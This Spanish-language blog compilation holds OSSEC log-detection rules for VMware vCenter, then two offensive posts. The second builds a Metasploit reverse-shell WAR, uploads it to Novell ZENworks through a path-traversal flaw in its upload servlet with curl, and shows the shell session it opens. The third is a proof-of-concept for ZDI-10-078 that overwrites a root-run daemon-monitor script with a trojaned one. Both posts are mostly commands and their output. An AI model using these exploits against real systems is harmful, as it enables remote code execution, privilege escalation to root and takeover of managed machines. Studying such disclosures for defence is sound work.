Reglas de OSSEC para vpxd

Ejemplo cutre de decoder/rules para que OSSEC entienda el vpxd.log de VMWare Virtual Center (Probado en vCenter 4).

Decoder

<!-- VMWare Virtual Center vpxd logs.
- [2010-04-29 13:42:52.048 03572 warning 'Libs'] SSLVerifyCertAgainstSystemStore: The remote host certificate has these problems:
- [2010-04-29 11:46:47.101 02144 info 'App'] [Auth]: User DOMAIN\luser
- [2010-04-29 13:54:54.406 02656 info 'App'] Unable to log on locally as DOMAIN\Administrator, so switched to NETWORK-style logon
-->

<decoder name="vpxd">
<prematch>^[\d\d\d\d-\d\d-\d\d \d\d:\d\d:\d\d.\d\d\d \d+ </prematch>
</decoder>

<decoder name="vpxd-extra">
<parent>vpxd</parent>
<regex offset="after_parent">^(\w+) '\w+'] (\.+)</regex>
<order>status, extra_data</order>
</decoder>



Rules

<!-- VMWare Virtual Center vpxd -->
<group name="vpxd,">
<rule id="19200" level="0">
<decoded_as>vpxd</decoded_as>
<description>VMWare Virtual Center vpxd messages grouped.</description>
</rule>
<rule id="19201" level="4">
<if_sid>19200</if_sid>
<status>^warning</status>
<description>VMWare Virtual Center vpxd warning message.</description>
</rule>

<rule id="19202" level="8">
<if_sid>19200</if_sid>
<status>^error</status>
<description>VMWare Virtual Center vpxd error message.</description>
</rule>

<rule id="19203" level="0">
<if_sid>19200</if_sid>
<status>^info</status>
<description>VMWare Virtual Center vpxd info message.</description>
</rule>

<!-- Authentication messages. -->
<rule id="19204" level="3">
<if_sid>19203</if_sid>
<match>[Auth]: User</match>
<description>VMWare Virtual Center vpxd authentication success.</description>
<group>authentication_success,</group>
</rule>

<rule id="19205" level="5">
<if_sid>19203</if_sid>
<match>Unable to log on locally as</match>
<description>VMWare Virtual Center vpxd NETWORK-style logon.</description>
<group>authentication_failed,</group>
</rule>

<!-- SSL errors. -->

<rule id="19206" level="5">
<if_sid>19201</if_sid>
<match>SSLVerifyCertAgainstSystemStore</match>
<description>VMWare Virtual Center vpxd SSL error.</description>
<group>system_error,</group>
</rule>
</group> <!-- VMWare Virtual Center vpxd -->
<!-- EOF -->



--
Saludos de #linux, tu canal comunitario.

Shell inversa con ficheros WAR

Creamos el WAR con metasploit.

luser$ ./msfpayload linux/x86/shell_reverse_tcp LHOST=10.31.33.7 LPORT=443 w > shell_reverse_tcp.war
Created by msfpayload (http://www.metasploit.com).
Payload: linux/x86/shell_reverse_tcp
Length: 71
Options: LHOST=10.31.33.7,LPORT=443


Listamos el contenido del WAR para conocer e nombre del fichero al que tendremos rlanzar la petición HTTP.

luser$ unzip -l shell_reverse_tcp.war
Archive: shell_reverse_tcp.war
Length Date Time Name
-------- ---- ---- ----
71 04-28-10 22:40 META-INF/MANIFEST.MF
0 04-28-10 22:40 WEB-INF/
285 04-28-10 22:40 WEB-INF/web.xml
1582 04-28-10 22:40 mcyowonbnhrqsyy.jsp
310 04-28-10 22:40 wNaoQNtbYmK.txt
-------- -------
2248 5 files


En otro terminal como root para que se pueda asociar al TCP/443...

root# ./msfcli exploit/multi/handler PAYLOAD=linux/x86/shell_reverse_tcp LHOST=10.31.33.7 LPORT=443 E
[*] Please wait while we load the module tree...
[*] Started reverse handler on 10.31.33.7:443
[*] Starting the payload handler...


Subimos el WAR.

luser$ curl -ivkl 'http://zcm.server/zenworks-fileupload/?type=application/octet-stream/../../../../../../../opt/novell/zenworks/share/tomcat/webapps&filename=zenw.war&overwrite=true' --data-binary @./shell_reverse_tcp.war -H "Content-Type: application/octet-stream"


Realizamos la petición HTTP para iniciar la shell inversa.

luser$ curl -ivkl 'http://zcm.server/zenw/mcyowonbnhrqsyy.jsp'


Y mágicamente en el terminal con el msfcli nos aparece la conexión.

[*] Command shell session 1 opened (10.31.33.7:443 -> 10.1.2.3:41221)

whoami
zenworks
pwd
/
netstat -putan | grep 443
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
tcp        0      0 0.0.0.0:443             0.0.0.0:*               LISTEN      -               
tcp        0      0 10.1.2.3:41221          10.31.33.7:443          ESTABLISHED 4519/sh         
pstree
init─┬─acpid
  ├─console-kit-dae───63*[{console-kit-dae}]
  ├─cron
  ├─dbus-daemon
  ├─java───17*[{java}]
  ├─java───39*[{java}]
  ├─jsvc───jsvc─┬─sh
  │             └─78*[{jsvc}]
  ├─klogd

--
Saludos de #linux, tu canal de script kiddies

PdC de ZDI-10-078


# Exploit Title: ZDI-10-078: Novell ZENworks Configuration Management UploadServlet Remote Code Execution Vulnerability
# Date: 2009-04-26
# Author: tucanalamigo http://tucanalamigo.blogspot.com
# Software Link: http://www.novell.com/products/zenworks/configurationmanagement/
# Version: 10.2
# Tested on: GNU/Linux (SLES11)


* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
PoC for vulnerability discovered by Stephen Fewer (www.harmonysecurity.com)
http://www.zerodayinitiative.com/advisories/ZDI-10-078/
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

You can overwrite any file owned by zenworks user (nearly all /opt/novell) such as /opt/novell/zenworks/bin/daemon-monitor that is a shell script executed by Novell ZENworks Daemon Monitor (/etc/init.d/novell-zenmntr) and "of course" running as root...


$ ls -l /opt/novell/zenworks/bin/daemon-monitor
-rw-rw-r-- 1 zenworks zenworks 554 XXXX-YY-ZZ 69:69 /opt/novell/zenworks/bin/daemon-monitor
$ cat /opt/novell/zenworks/bin/daemon-monitor
SERVICES=`awk -F= '{ if ($1 == # "services") print $2}' /etc/opt/novell/zenworks/monitor.conf`
SLEEPTIME=`awk -F= '{ if ($1 == "sleep") print $2}' /etc/opt/novell/zenworks/monitor.conf`

echo $SERVICES
echo $SLEEPTIME

if [ -z "$SERVICES" ]; then
echo "No services defined in /etc/opt/novell/zenworks/monitor.conf"
exit 1
fi

if [ -z "$SLEEPTIME" ]; then
SLEEPTIME=10
fi

while [ 1 ]; do
sleep $SLEEPTIME
for SRV in $SERVICES; do
/etc/init.d/$SRV status >/dev/null 2>&1 || /etc/init.d/$SRV start
( date ; id ) >> /tmp/monitor.log 2>&1
done
done
$


You can change /opt/novell/zenworks/bin/jsvc (Java Virtual Machine), upload a new remoteshell.war on /opt/novell/zenworks/share/tomcat/webapps or use
imagination to take control of all machines configured in ZCM.

PoC: Upload your own daemon-monitor (./daemon-monitor.troyanizado):


$ curl -ivkl 'http://zcm.server/zenworks-fileupload/?type=application/octet-stream/../../../../../../../opt/novell/zenworks/bin/&filename=daemon-monitor&overwrite=true' --data-binary @./daemon-monitor.troyanizado -H "Content-Type: application/octet-stream"
* About to connect() to zcm.server port 80 (#0)
* Trying 127.11.22.33... connected
* Connected to zcm.server (127.11.22.33) port 80 (#0)
> POST /zenworks-fileupload/?type=application/octet-stream/../../../../../../../opt/novell/zenworks/bin/&filename=daemon-monitor&overwrite=true HTTP/1.1
> User-Agent: curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.12.6.2 zlib/1.2.3 libidn/1.9 libssh2/1.2.2
> Host: zcm.server
> Accept: */*
> Content-Type: application/octet-stream
> Content-Length: 554
< HTTP/1.1 200 OK
HTTP/1.1 200 OK
< Server: Apache-Coyote/1.1
Server: Apache-Coyote/1.1
< Content-Length: 0
Content-Length: 0
< Date: Mon, 26 Apr 2010 21:58:05 GMT
Date: Mon, 26 Apr 2010 21:58:05 GMT


* Connection #0 to host zcm.server left intact
* Closing connection #0
$



--
Saludos de #linux, tu canal amigo.